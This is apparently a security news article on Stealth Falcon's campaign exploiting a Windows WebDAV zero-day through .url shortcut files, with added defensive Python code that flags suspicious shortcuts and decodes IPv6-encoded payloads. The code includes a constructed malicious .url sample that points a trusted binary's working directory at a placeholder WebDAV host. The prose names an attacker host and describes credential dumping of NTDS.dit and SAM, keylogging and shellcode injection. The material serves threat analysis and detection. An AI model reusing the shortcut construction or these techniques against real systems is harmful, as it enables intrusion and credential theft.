
A new cyberespionage campaign attributed to the notorious APT group Stealth Falcon has been uncovered by Check Point Research (CPR), highlighting the weaponization of a zero-day vulnerability (CVE-2025-33053) in Microsoft Windows WebDAV. The sophisticated attacks, focused primarily on defense entities in the Middle East and Africa, leveraged .url files, living-off-the-land binaries (LOLBins), and a custom-built Mythic agent dubbed Horus to stealthily infiltrate high-profile targets.
“The attack used a .url file that exploited a zero-day vulnerability (CVE-2025-33053) to execute malware from an actor-controlled WebDAV server,” CPR revealed in their threat report.
The vulnerability, patched by Microsoft on June 10, 2025, allows remote code execution via manipulated working directories. By crafting a malicious .url file, the attackers exploited Windows’ execution flow to substitute legitimate system binaries with malware hosted on attacker-controlled WebDAV servers.
In one case, a file titled TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url was submitted by a Turkish defense company. The shortcut was crafted to execute iediagcmd.exe—a legitimate Windows diagnostic tool—but redirected its working directory to a WebDAV server, causing it to run a malicious route.exe instead of the system binary.
“The iediagcmd tool will run the route.exe executable the attackers placed in \summerartcamp[.]net@ssl@443… instead of a legitimate one in system32,” CPR explained.
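As an added illustration of the mechanism described above (this is example code written for this article, not code from the Check Point report), the following Python script parses `.url` (InternetShortcut) files and flags the combination the article describes: a `WorkingDirectory` that points at a UNC/WebDAV location, together with a target binary that resolves helper executables relative to that directory. The host name, share path and the two-finding threshold are constructed placeholders; the only target name in the list is the one named on this page.

```python
import configparser
import re

# Signs that a path resolves to a WebDAV share on Windows: the "@SSL" / "@port"
# host suffix syntax or the DavWWWRoot pseudo-folder. Heuristic, not exhaustive.
WEBDAV_HINTS = re.compile(r"(@ssl|@\d{2,5}\b|davwwwroot)", re.IGNORECASE)
# A plain UNC path (\\host\...) is remote even without WebDAV markers.
UNC_PREFIX = re.compile(r"^\\\\[^\\]+")
# Signed Windows binaries known (from the article) to launch helpers such as
# route.exe from the working directory. Extend only with evidence.
WORKDIR_SENSITIVE_TARGETS = {"iediagcmd.exe"}


def parse_url_shortcut(text):
    """Return the [InternetShortcut] keys of a .url file as a lower-cased dict.

    .url files are INI-like; configparser lower-cases keys for us. Only "="
    is treated as a delimiter so that "file:///C:/..." values stay intact.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}  # not a well-formed shortcut: nothing to assess
    for name in cp.sections():
        if name.lower() == "internetshortcut":
            return dict(cp[name])
    return {}


def target_basename(url_value):
    """Extract the file name a file:// URL or local path points at (lower-cased)."""
    path = url_value.strip().strip('"')
    if path.lower().startswith("file:"):
        path = path[5:].lstrip("/")
    path = path.replace("\\", "/")
    return path.rsplit("/", 1)[-1].lower()


def assess_url_shortcut(text):
    """Score a .url file; two or more findings mark it suspicious."""
    fields = parse_url_shortcut(text)
    url = fields.get("url", "")
    workdir = fields.get("workingdirectory", "")
    findings = []
    if WEBDAV_HINTS.search(workdir) or UNC_PREFIX.match(workdir.strip()):
        findings.append("working directory points at a remote (UNC/WebDAV) location")
    if WEBDAV_HINTS.search(url):
        findings.append("URL itself references a WebDAV share")
    target = target_basename(url)
    if target in WORKDIR_SENSITIVE_TARGETS:
        findings.append(f"target {target} loads helper executables from the working directory")
    return {
        "target": target,
        "working_directory": workdir,
        "findings": findings,
        "suspicious": len(findings) >= 2,
    }


# Constructed sample modelled on the article's description: a local LOLBin as
# the target and a WebDAV share as the working directory. Host is a placeholder.
SAMPLE_MALICIOUS = r"""[InternetShortcut]
URL=file:///C:/Windows/System32/iediagcmd.exe
WorkingDirectory=\\webdav.example.invalid@SSL@443\DavWWWRoot\share\
IconFile=C:\Windows\System32\SHELL32.dll
IconIndex=1
"""

# Constructed benign shortcut for comparison.
SAMPLE_BENIGN = """[InternetShortcut]
URL=https://www.example.com/
IconIndex=0
"""

if __name__ == "__main__":
    for label, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, assess_url_shortcut(sample))
```

Run it over a directory of quarantined `.url` attachments and the `findings` list explains why each file was flagged; a remote working directory on its own is only one signal, so a legitimate intranet shortcut does not trip the two-finding threshold.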
The attack chain is multi-staged and cleverly obfuscated. The initial .url file loads a C++ malware loader called Horus Loader, which employs:
- Code Virtualizer obfuscation
- Anti-debugging techniques
- Manual DLL mapping
- Decoy document execution
- Memory-resident payload injection
Horus Loader decrypts and displays a legitimate PDF while injecting a custom payload—entirely composed of IP-fuscated IPv6 strings—into a suspended process (msedge.exe), effectively hiding the payload in network syntax.
“What’s revealed is a large list of IPv6 addresses… converted into the payload using thousands of calls to RtlIpv6StringToAddressA,” the researchers wrote.
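To give analysts something concrete for the IP-fuscation just described, here is an added Python example (written for this article, not taken from the report or the malware) that finds IPv6 literals in a text dump such as a decompiler string table, rejects look-alikes that are not valid addresses, and reverses the encoding by packing each address back into its 16 bytes, the inverse of what `RtlIpv6StringToAddressA` does at run time. The string-table excerpt and the run-length threshold are constructed.

```python
import ipaddress
import re

# Candidate IPv6 text: at least two colon-separated hex groups, bounded by
# non-address characters. Deliberately loose; ipaddress does the validation.
IPV6_CANDIDATE = re.compile(
    r"(?<![0-9A-Fa-f:])(?:[0-9A-Fa-f]{0,4}:){2,7}[0-9A-Fa-f]{0,4}(?![0-9A-Fa-f:])"
)


def find_ipv6_literals(text):
    """Return every substring that parses as an IPv6 address, in file order.

    Compressed forms ("::") are accepted, as they are by RtlIpv6StringToAddressA.
    Timestamps and other colon-separated numbers fail validation and are dropped.
    """
    found = []
    for match in IPV6_CANDIDATE.finditer(text):
        candidate = match.group(0)
        try:
            ipaddress.IPv6Address(candidate)
        except ValueError:
            continue
        found.append(candidate)
    return found


def decode_ipv6_strings(addresses):
    """Reverse the encoding: each address contributes its 16 packed bytes."""
    return b"".join(ipaddress.IPv6Address(a).packed for a in addresses)


def ipfuscation_score(text, threshold=8):
    """Count IPv6 literals in a dump and recover the bytes they carry.

    A normal binary embeds a handful of addresses at most; a payload encoded
    this way yields hundreds or thousands (the article mentions "thousands of
    calls"), so a simple count is a usable triage signal.
    """
    addresses = find_ipv6_literals(text)
    return {
        "count": len(addresses),
        "suspicious": len(addresses) >= threshold,
        "decoded": decode_ipv6_strings(addresses),
    }


# Constructed excerpt of a decompiled string table (not from the real sample).
# The first two addresses carry the canonical first 32 bytes of a PE/MZ header;
# the third spells out readable text so the round trip is easy to eyeball.
SAMPLE_STRING_TABLE = """\
; constructed excerpt of a decompiled string table (not from the real sample)
push offset "4d5a:9000:0300:0000:0400:0000:ffff:0000"
push offset "b800:0000:0000:0000:4000:0000:0000:0000"
push offset "4865:6c6c:6f2c:2077:6f72:6c64:2121:2121"
; a timestamp such as 12:34:56 is not a valid address and is ignored
"""

if __name__ == "__main__":
    result = ipfuscation_score(SAMPLE_STRING_TABLE, threshold=3)
    print("addresses found:", result["count"], "suspicious:", result["suspicious"])
    print("decoded bytes:", result["decoded"])
```

On a real dump the recovered bytes are written to a file and handed to the usual PE tooling; the `MZ` magic at offset 0 in the decoded output is the quick sanity check that the addresses were concatenated in the right order.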
Once executed, the Horus Agent, a highly customized C++ implant built on the Mythic C2 framework, takes over. It communicates with a C2 infrastructure using AES encryption, HMAC integrity checks, and base64 encoding, and supports stealthy commands like:
- survey – Fingerprint target machine
- shinjectchunked – Shellcode injection in stealth mode
- upload – Data exfiltration
- exit – Clean termination
The implant implements string obfuscation, API hashing, control flow flattening, and dummy Windows API imports to evade static analysis.
“This is likely intended to confuse static analysis engines… observed in previous Stealth Falcon backdoors,” Check Point stated.
The campaign also revealed a robust post-compromise toolkit, including:
- DC Credential Dumper: Extracts NTDS.dit, SAM, and SYSTEM files from virtual disks to bypass live OS locks.
- Passive Backdoor: A lightweight AES-encrypted listener embedded in a fake “User Profile Service Check.”
- Custom Keylogger: Logs keystrokes to RC4-encrypted files in C:\Windows\Temp.
Check Point attributes the campaign to Stealth Falcon (a.k.a. FruityArmor) based on code similarities, infrastructure overlaps, and region-specific targeting. The APT group has a known history of espionage campaigns against:
- Government and military organizations
- Intelligence agencies
- Strategic technology companies
“Stealth Falcon’s activities are largely focused on the Middle East and Africa, with high-profile targets in the government and defense sectors observed in Turkey, Qatar, Egypt, and Yemen,” the report states.
The Horus Agent marks a significant evolution from Stealth Falcon’s earlier implants like Apollo, a .NET-based Mythic agent. Unlike Apollo, Horus is rewritten in C++, offers more stealth, and combines multiple injection techniques into unified, configurable modules.